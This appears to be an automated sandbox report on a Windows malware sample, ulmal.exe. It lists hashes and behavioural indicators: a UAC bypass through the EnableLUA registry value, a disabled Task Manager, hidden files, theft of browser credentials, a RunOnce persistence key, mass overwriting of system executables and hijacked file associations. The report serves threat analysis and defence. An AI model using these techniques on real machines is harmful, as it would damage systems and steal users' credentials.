e804bc0a02ea7d5fefb83e6d930debe79a577ec38d6515097a8e386e98d3df6c

Resubmissions

02/08/2024, 14:36

240802-rys6qsxgqk 10

02/08/2024, 14:33

01/08/2024, 10:24

01/08/2024, 10:19

01/08/2024, 10:18

01/08/2024, 10:16

01/08/2024, 10:11

01/08/2024, 09:58

Analysis

max time kernel
149s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240729-en
resource tags

arch:x64arch:x86image:win11-20240729-enlocale:en-usos:windows11-21h2-x64system
submitted
02/08/2024, 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ulmal.exe
Size

346KB
MD5

52498c795e8c3345b624e109c40286a4
SHA1

62c627edf605e1e81cc59e0e53fa6d0668fbefd4
SHA256

e804bc0a02ea7d5fefb83e6d930debe79a577ec38d6515097a8e386e98d3df6c
SHA512

b33357f5ad5ae6301b6d011814b7d141a2ef2373e3189f4c2c8496e2a96bca307ae6d1db71dd0cc124c2ee4003780dd148f1c8731e44c8d1f49819cb10e72e22
SSDEEP

6144:zldk1cWQRNTBY6OporHeABivZQFc3CXy2GldoodgSqqRUl84rV:zcv0NTG6OqrHeAOaLoySG86

Score

10^/10

discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
960	attrib.exe
3676	attrib.exe

Executes dropped EXE 4 IoCs

pid	Process
2896	BSOD.exe
2848	winupdate.exe
2552	BluescreenSimulator.exe
4744	BluescreenSimulator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	BSOD.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\SystemUWPLauncher.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\xcopy.exe	cmd.exe
File created	C:\Windows\SysWOW64\ARP.EXE	cmd.exe
File created	C:\Windows\System32\EoAExperiences.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\efsui.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\msfeedssync.exe	cmd.exe
File opened for modification	C:\Windows\System32\Eap3Host.exe	cmd.exe
File created	C:\Windows\SysWOW64\icacls.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\prevhost.exe	cmd.exe
File opened for modification	C:\Windows\System32\chkdsk.exe	cmd.exe
File created	C:\Windows\SysWOW64\IME\IMEJP\IMJPDCT.EXE	cmd.exe
File created	C:\Windows\System32\wiaacmgr.exe	cmd.exe
File opened for modification	C:\Windows\System32\Boot\winresume.exe	cmd.exe
File created	C:\Windows\System32\backgroundTaskHost.exe	cmd.exe
File opened for modification	C:\Windows\System32\whoami.exe	cmd.exe
File created	C:\Windows\System32\LaunchWinApp.exe	cmd.exe
File created	C:\Windows\System32\control.exe	cmd.exe
File opened for modification	C:\Windows\System32\PackagedCWALauncher.exe	cmd.exe
File opened for modification	C:\Windows\System32\oobe\audit.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ROUTE.EXE	cmd.exe
File opened for modification	C:\Windows\System32\aitstatic.exe	cmd.exe
File created	C:\Windows\System32\DeviceEnroller.exe	cmd.exe
File created	C:\Windows\System32\mcbuilder.exe	cmd.exe
File created	C:\Windows\System32\MicrosoftEdgeDevTools.exe	cmd.exe
File created	C:\Windows\System32\appidpolicyconverter.exe	cmd.exe
File created	C:\Windows\System32\Defrag.exe	cmd.exe
File created	C:\Windows\System32\InputSwitchToastHandler.exe	cmd.exe
File opened for modification	C:\Windows\System32\xcopy.exe	cmd.exe
File created	C:\Windows\System32\InputMethod\CHT\ChtIME.exe	cmd.exe
File created	C:\Windows\System32\ClipDLS.exe	cmd.exe
File created	C:\Windows\System32\omadmclient.exe	cmd.exe
File opened for modification	C:\Windows\System32\NgcIso.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Dism.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\finger.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\msdt.exe	cmd.exe
File created	C:\Windows\SysWOW64\raserver.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\userinit.exe	cmd.exe
File created	C:\Windows\SysWOW64\control.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\IME\IMEJP\imjpuexc.exe	cmd.exe
File created	C:\Windows\System32\grpconv.exe	cmd.exe
File created	C:\Windows\SysWOW64\charmap.exe	cmd.exe
File created	C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe	cmd.exe
File created	C:\Windows\System32\rrinstaller.exe	cmd.exe
File opened for modification	C:\Windows\System32\netbtugc.exe	cmd.exe
File opened for modification	C:\Windows\System32\relog.exe	cmd.exe
File opened for modification	C:\Windows\System32\securekernella57.exe	cmd.exe
File opened for modification	C:\Windows\System32\tttracer.exe	cmd.exe
File opened for modification	C:\Windows\System32\LaunchTM.exe	cmd.exe
File opened for modification	C:\Windows\System32\ie4ushowIE.exe	cmd.exe
File opened for modification	C:\Windows\System32\MRINFO.EXE	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fixmapi.exe	cmd.exe
File created	C:\Windows\SysWOW64\wowreg32.exe	cmd.exe
File created	C:\Windows\System32\EDPCleanup.exe	cmd.exe
File opened for modification	C:\Windows\System32\odbcconf.exe	cmd.exe
File created	C:\Windows\SysWOW64\netiougc.exe	cmd.exe
File created	C:\Windows\System32\cmd.exe	cmd.exe
File created	C:\Windows\System32\cttune.exe	cmd.exe
File opened for modification	C:\Windows\System32\EduPrintProv.exe	cmd.exe
File created	C:\Windows\System32\regsvr32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\iscsicpl.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wowreg32.exe	cmd.exe
File opened for modification	C:\Windows\System32\CastSrv.exe	cmd.exe
File opened for modification	C:\Windows\System32\gpresult.exe	cmd.exe
File created	C:\Windows\System32\netsh.exe	cmd.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Integrator.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	cmd.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	cmd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exe	cmd.exe
File created	C:\Program Files\Windows Photo Viewer\ImagingDevices.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedge.exe	cmd.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	cmd.exe
File created	C:\Program Files\Windows Mail\wabmig.exe	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\NewsStub.exe	cmd.exe
File created	C:\Program Files\Windows Mail\wab.exe	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Video.UI.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	cmd.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVLP.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoasb.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msotd.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE	cmd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	cmd.exe
File created	C:\Program Files\Windows Media Player\wmpnscfg.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\MicrosoftEdgeUpdate.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\notification_helper.exe	cmd.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe	cmd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\ImagingDevices.exe	cmd.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe	cmd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exe	cmd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	cmd.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnscfg.exe	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\XboxStub.exe	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\SnippingTool\SnippingTool.exe	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Todo.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\ohub32.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wabmig.exe	cmd.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	cmd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	cmd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE	cmd.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\wmpshare.exe	cmd.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe	cmd.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE	cmd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Media Player\wmlaunch.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-App.exe	cmd.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	cmd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	cmd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\WinSxS\amd64_microsoft-windows-regini_31bf3856ad364e35_10.0.22000.1_none_6299da14be99f6ee\regini.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-verclsid_31bf3856ad364e35_10.0.22000.1_none_122a6edc183d5f90\verclsid.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-d..tofservice-oposhost_31bf3856ad364e35_10.0.22000.1_none_dd6521dd430a0c17\OposHost.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-openfiles_31bf3856ad364e35_10.0.22000.1_none_3d6a04a6ef2d3d73\openfiles.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.22000.258_none_570e91ed5ac8ebe3\r\Microsoft.AAD.BrokerPlugin.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-x..rtificateenrollment_31bf3856ad364e35_10.0.22000.434_none_f949c91148399a9c\CertEnrollCtrl.exe	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.22000.318_none_569ec118f1c50925\r\winload.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-credwiz_31bf3856ad364e35_10.0.22000.1_none_f61e4e51709e31f8\credwiz.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\f\ie4uinit.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx4-ngen_exe_b03f5f7f11d50a3a_4.0.15806.256_none_f3055d6fbd1168d8\ngen.exe	cmd.exe
File opened for modification	C:\Windows\BrowserCore\BrowserCore.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..ting-tools-printbrm_31bf3856ad364e35_10.0.22000.1_none_d7fdc61a4a1da73a\PrintBrmEngine.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-wmpnss-ux_31bf3856ad364e35_10.0.22000.1_none_0e0860b6be3fb3ea\wmpnscfg.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\x86_microsoft-windows-d..ommandline-repadmin_31bf3856ad364e35_10.0.22000.1_none_fae929129f87138b\repadmin.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\ScreenClippingHost.exe	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-fax-service_31bf3856ad364e35_10.0.22000.1_none_0367376385127fe1\FXSUNATD.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpshare.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-netbt_31bf3856ad364e35_10.0.22000.1_none_b6a86607fc0d3ad5\netbtugc.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\WebExperienceHostApp.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-x..rtificateenrollment_31bf3856ad364e35_10.0.22000.434_none_f949c91148399a9c\CertEnrollCtrl.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-appmanagement-uevagent_31bf3856ad364e35_10.0.22000.469_none_f7ee9eea6a40784c\UevTemplateBaselineGenerator.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-lua_31bf3856ad364e35_10.0.22000.1_none_fc8dfad861947ee8\consent.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-mschedexe_31bf3856ad364e35_10.0.22000.1_none_35e1f264b734c538\MSchedExe.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_6ec3ffab3ec4b07b\r\LaunchWinApp.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-u..te-orchestratorcore_31bf3856ad364e35_10.0.22000.282_none_81f8a77609cf735a\f\MoUsoCoreWorker.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_multipoint-wmsmanager_31bf3856ad364e35_10.0.22000.1_none_72526c5b8ceef21d\WmsManager.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\reset.exe	cmd.exe
File opened for modification	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.318_none_c7ea7e014d4524f4\AppVDllSurrogate.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-bioenrollment.appxmain_31bf3856ad364e35_10.0.22000.120_none_fbcb84a27b36694e\r\BioEnrollmentHost.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-deviceproperties_31bf3856ad364e35_10.0.22000.1_none_408e00a93eb2182b\DeviceProperties.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\msconfig.exe	cmd.exe
File created	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.22000.348_none_a52aaf9adfbcd9fc_fontdrvhost.exe_94bdc76d	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-eventcreate_31bf3856ad364e35_10.0.22000.1_none_35fb189c78bdb167\eventcreate.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.22000.318_none_7fdfd2b2e06a7af9\f\nvspinfo.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-a..eapplifetimemanager_31bf3856ad364e35_10.0.22000.1_none_bd5081933d30392a\RemoteAppLifetimeManager.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-b..environment-windows_31bf3856ad364e35_10.0.22000.469_none_647b90a512106929\winresume.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ldifde_31bf3856ad364e35_10.0.22000.1_none_772ade6a0d9b8f2a\ldifde.exe	cmd.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe	cmd.exe
File opened for modification	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\f\wifitask.exe	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.22000.282_none_88ab4ca49843f4b5\VmComputeAgent.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..hreshold-adminflows_31bf3856ad364e35_10.0.22000.100_none_1c26ef58a3003bf2\SystemSettingsAdminFlows.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_netfx4-mscorsvw_exe_b03f5f7f11d50a3a_4.0.15806.0_none_7d39f9a025126e55\mscorsvw.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-control_31bf3856ad364e35_10.0.22000.318_none_9f38aa7663fcbf45\f\control.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-alg_31bf3856ad364e35_10.0.22000.1_none_ff2cefc65fe79cac\alg.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-capturepicker.appxmain_31bf3856ad364e35_10.0.22000.120_none_3023ad156f648a5a\f\CapturePicker.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_netfx4-aspnet_wp_exe_b03f5f7f11d50a3a_4.0.15806.0_none_0e9791f66fedf564\aspnet_wp.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_7918a9fd73257276\r\LaunchWinApp.exe	cmd.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Ldr64.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..pertiescomputername_31bf3856ad364e35_10.0.22000.1_none_86b6cff74107116e\SystemPropertiesComputerName.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.22000.493_none_7f8453c6e0afd8f5\nvspinfo.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-container-manager_31bf3856ad364e35_10.0.22000.318_none_8e5804ec62c5891c\f\cmproxyd.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..resentationsettings_31bf3856ad364e35_10.0.22000.1_none_c36af850083330df\PresentationSettings.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-shell-customshellhost_31bf3856ad364e35_10.0.22000.120_none_83fc3979242f7e2e\CustomShellHost.exe	cmd.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..client-decoder-host_31bf3856ad364e35_10.0.22000.318_none_1e08617dd1895eb7\f\UtcDecoderHost.exe	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certutil_31bf3856ad364e35_10.0.22000.434_none_bb381a0becef4d51\f\certutil.exe	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ulmal.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3616	taskkill.exe
2112	taskkill.exe
2300	taskkill.exe

Modifies registry class 11 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\C:\Windows	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\C:\Windows\*.dll\ = "txtfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\C:\Windows\*.txt\ = "htmlfile"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1008421703-1762585720-607722284-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\C:\Windows\*.dll	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\C:	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\C:\Windows\*.txt	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1976	tskill.exe
1976	tskill.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	3616	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4744	BluescreenSimulator.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3956 wrote to memory of 1112	3956	ulmal.exe	82
PID 3956 wrote to memory of 1112	3956	ulmal.exe	82
PID 1112 wrote to memory of 2896	1112	cmd.exe	86
PID 1112 wrote to memory of 2896	1112	cmd.exe	86
PID 1112 wrote to memory of 2848	1112	cmd.exe	87
PID 1112 wrote to memory of 2848	1112	cmd.exe	87
PID 1112 wrote to memory of 2848	1112	cmd.exe	87
PID 2896 wrote to memory of 5060	2896	BSOD.exe	88
PID 2896 wrote to memory of 5060	2896	BSOD.exe	88
PID 2848 wrote to memory of 244	2848	winupdate.exe	90
PID 2848 wrote to memory of 244	2848	winupdate.exe	90
PID 5060 wrote to memory of 2552	5060	cmd.exe	91
PID 5060 wrote to memory of 2552	5060	cmd.exe	91
PID 244 wrote to memory of 460	244	cmd.exe	93
PID 244 wrote to memory of 460	244	cmd.exe	93
PID 460 wrote to memory of 2344	460	net.exe	94
PID 460 wrote to memory of 2344	460	net.exe	94
PID 244 wrote to memory of 2112	244	cmd.exe	95
PID 244 wrote to memory of 2112	244	cmd.exe	95
PID 244 wrote to memory of 1044	244	cmd.exe	97
PID 244 wrote to memory of 1044	244	cmd.exe	97
PID 1044 wrote to memory of 4716	1044	net.exe	98
PID 1044 wrote to memory of 4716	1044	net.exe	98
PID 244 wrote to memory of 2076	244	cmd.exe	99
PID 244 wrote to memory of 2076	244	cmd.exe	99
PID 2076 wrote to memory of 3680	2076	net.exe	100
PID 2076 wrote to memory of 3680	2076	net.exe	100
PID 244 wrote to memory of 2952	244	cmd.exe	101
PID 244 wrote to memory of 2952	244	cmd.exe	101
PID 2952 wrote to memory of 3452	2952	net.exe	102
PID 2952 wrote to memory of 3452	2952	net.exe	102
PID 244 wrote to memory of 428	244	cmd.exe	103
PID 244 wrote to memory of 428	244	cmd.exe	103
PID 428 wrote to memory of 4232	428	net.exe	104
PID 428 wrote to memory of 4232	428	net.exe	104
PID 244 wrote to memory of 2300	244	cmd.exe	105
PID 244 wrote to memory of 2300	244	cmd.exe	105
PID 2552 wrote to memory of 4744	2552	BluescreenSimulator.exe	106
PID 2552 wrote to memory of 4744	2552	BluescreenSimulator.exe	106
PID 244 wrote to memory of 3904	244	cmd.exe	107
PID 244 wrote to memory of 3904	244	cmd.exe	107
PID 3904 wrote to memory of 4240	3904	net.exe	108
PID 3904 wrote to memory of 4240	3904	net.exe	108
PID 244 wrote to memory of 4248	244	cmd.exe	161
PID 244 wrote to memory of 4248	244	cmd.exe	161
